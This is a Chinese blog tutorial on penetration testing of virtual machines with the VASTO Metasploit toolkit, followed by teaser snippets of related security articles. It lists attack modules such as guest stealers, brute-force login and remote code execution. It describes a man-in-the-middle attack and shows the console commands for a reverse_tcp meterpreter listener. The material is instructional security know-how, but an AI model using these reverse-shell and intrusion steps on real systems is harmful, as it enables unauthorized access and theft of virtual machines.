针对虚拟机的渗透测试

如今虚拟化在各个企业中应用的越来越多,且火热的云计算也依托于此技术。虚拟化技术确实能够使物理资源的利用更加灵活和便捷,那么虚拟机的安全性如何?相比传统架构,是否像传说中的一样安全?

  什么是虚拟化

  虚拟化是指计算机元件在虚拟的基础上而不是真实的基础上运行。虚拟化技术可以扩大硬件的容量,简化软件的重新配置过程。CPU的虚拟化技术可以单CPU模拟多CPU并行,允许一个平台同时运行多个操作系统,并且应用程序都可以在相互独立的空间内运行而互不影响,从而显著提高计算机的工作效率。我们先来看看虚拟机的层次结构图。

  虚拟机完全独立于其底层物理硬件。 例如,你可以为虚拟机配置与底层硬件上存在的物理组件完全不同的虚拟组件(例如,CPU、网卡、SCSI 控制器)。 同一物理服务器上的各个虚拟机甚至可以运行不同类型的操作系统(WindowsLinux 等)

  针对虚拟机的渗透测试

  VASTO是一个专用的虚拟机渗透测试工具,支持VMware, Oracle和Xen,可以与神器Metasploit有很好的结合。使用前需要先解压,然后复制metasploit文件夹下中

  VASTO的主要模块如下,功能还是比较强大的

  abiquo_guest_stealer – Abiquo guest stealer
abiquo_poison – Abiquo poison
eucalyptus_bouncer – Eucalyptus Bouncer
eucalyptus_poison – Eucalyptus Poison
oraclevm_oravma_fileread – Oracle VM agent remote code execution
vmware_autopwner – VMautopwn
vmware_guest_stealer – VMware Guest Stealer
vmware_login – VMware Login check scanner
vmware_session_rider – VMware Session Rider
vmware_studio_upload – VMware Studio<2.0.0.946-172280 Remote Code Execution
vmware_updatemanager_traversal – Update manager path traversal
vmware_version – VMware products fingerprintervmware_vilurker – VIlurker VIclient attack
vmware_webaccess_portscan – VMware Web Access Relay Port Scanner
xen_login – Xen Login Check Scanner
oracle_oravma_exec – Oracle VM agent remote code execution
vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec
vmware_tomcat_killer – VMware tomcat killer
Versionsscanner Modul:

  用于判断VM的版本等信息

 Login Scanner Modul:

  这个模块可以使用字典尝试暴力登录虚拟机

  vilurker module

  这个模块原理即利用ettercap等进行中间人攻击,欺骗成功后,当被攻击者(client)访问server时会弹出窗体,若点击即反弹一个meterpreter。

  先multi/handler监听

  msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <Local Host IP here>
msf exploit(handler) > exploit

  欺骗过程如下

  返回shell(meterpreter)

====================================分割线================================

最新内容请见作者的GitHub页:http://qaseven.github.io/

时间: 2024-11-05 19:25:28

针对虚拟机的渗透测试的相关文章

针对SOAP的渗透测试与防护

SOAP概述 简单对象访问协议(SOAP)是连接或Web服务或客户端和Web服务之间的接口.SOAP通过应用层协议(如HTTP,SMTP或甚至TCP)进行操作,用于消息传输. 图1 SOAP操作 它是基于xml语言开发的,它使用Web服务描述语言(WSDL)来生成Web服务之间的接口.如果客户端或用户的独立应用程序想要与Web服务连接,则它需要由应用程序生成的服务端点接口(SEI).这些接口WSDL和SEI是使用自动化工具或手动生成的,它们具有平台无关性.通用描述,发现和集成(UDDI)是Web

一次针对SAP系统的完美渗透测试

本文讲的是一次针对SAP系统的完美渗透测试, 什么是SAP 渗透测试? SAP为"System Applications and Products"的简称,是SAP公司的产品--企业管理解决方案的软件名称.SAP公司成立于1972年.总部位于德国沃尔多夫市,在全球拥有6万多名员工,遍布全球130个国家,并拥有覆盖全球11,500家企业的合作伙伴网络.作为全球领先的企业管理软件解决方案提供商,SAP帮助各行业不同规模的企业实现卓越运营. 那么为什么我们需要去了解SAP系统的安全性?第一个

《黑客秘笈——渗透测试实用指南(第2版)》—第1章1.5节构建渗透测试环境

1.5 构建渗透测试环境 在本书第1版中,收到很多关于为什么要让读者搭建和安装工具而不是创建脚本自动化完成这些工作的评论.主要原因是想让读者亲自经历这些步骤,这些工具都非常重要,搭建和安装的过程将有助于您知道武器库里都有什么工具.以Kali Linux为例,它包括大量工具,而且进行了很好的组织和归类,但是如果不知道这个工具已经安装了或者没使用它进行过单独的攻击,那么在紧急的情况下很难正确使用这个工具. 1.5.1 安装一个渗透测试环境 如果您根据本书第1版建立了测试环境,就可以跳过本节.众所周知

渗透测试中的冷却启动攻击和其他取证技术

这是一个星期四的晚上,快乐时光即将开始.你会尽快走出办公室.你整天都忙于准备一份报告,第二天早上还需继续,因此你将电脑锁屏.这足够安全,是吗?因为你使用了高强度密码,并全盘加密,Ophcrack或者可引导的linux发行版例如kali不起作用.你自认为安全了,其实你错了.为了得到重要材料,攻击者越来越无所不用其极,这包括使用取证领域的最新技术. 计算机中存在一个单独的区块:活动内存,任何一个攻击者都愿意把手伸到这个存储有敏感信息完全未加密的区块.系统为了方便调用,在内存中存储了多种有价值信息:全

《Metasploit渗透测试手册》目录—导读

版权声明 Metasploit渗透测试手册 Copyright Packt Publishing 2012. First published in the English language under the title Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide. All Rights Reserved. 本书由英国Packt Publishing公司授权人民

《BackTrack 5 Cookbook中文版——渗透测试实用技巧荟萃》目录—导读

版权声明 BackTrack 5 Cookbook中文版--渗透测试实用技巧荟萃 Copyright @ Packt Publishing 2012. First Published in the English language under the title PhoneGap Beginner's Guide. All Rights Reserved. 本书由英国Packt Publishing公司授权人民邮电出版社出版.未经出版者书面许可,对本书的任何部分不得以任何方式或任何手段复制和传播

《高度安全环境下的高级渗透测试》—第1章1.3节制订执行计划

1.3 制订执行计划一旦开始测试,你需要准备一些东西.这需要一个执行计划,你的所有设备和脚本都需要启动并处于运行状态,你还需要制定一些机制来记录所有的步骤和操作.这样也能为你自己和团队其他成员提供一个参考.你可能现在还记得绕过某台防火墙的步骤,但是当你在4个月之后面对同样的防火墙时,你还记得住么?做好记录对一次成功的渗透测试而言至关重要. 对于本书而言,我们将使用VirtualBox来回顾BackTrack套件的安装过程.VirtualBox是在GNU通用公共许可协议(GPL)保护下,由Orac

Web应用手工渗透测试—用SQLMap进行SQL盲注测试

简介 本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffix and prefix )注入到数据库.本文将更进一步,讨论SQL盲注,如果读者没有任何相关知识储备,建议先去wikipedia学习一下.在继续之前需要提醒一下,如果读者也想要按本文的步骤进行,需要在NOWASP Mutillidae环境搭建好之后先注册一个NOWASP Mutillidae帐号. SQL注入前言 本文演示从w

kali linux web渗透测试学习笔记

    kali linux web渗透测试学习笔记 metasploit使用方法: 启动: 第一步:启用Postgresql服务.service postgresql start 第二步:启用metasploit服务.service matasploit start 第三步:启动框架.msfconsole 一个ASP站点的sql注入 测试数字型注入点 1.网址:asp?ID+13,后面加',看看是什么数据库,然后输入1=1,1=2,得到数据库是microsoft acess 2.转用sqlma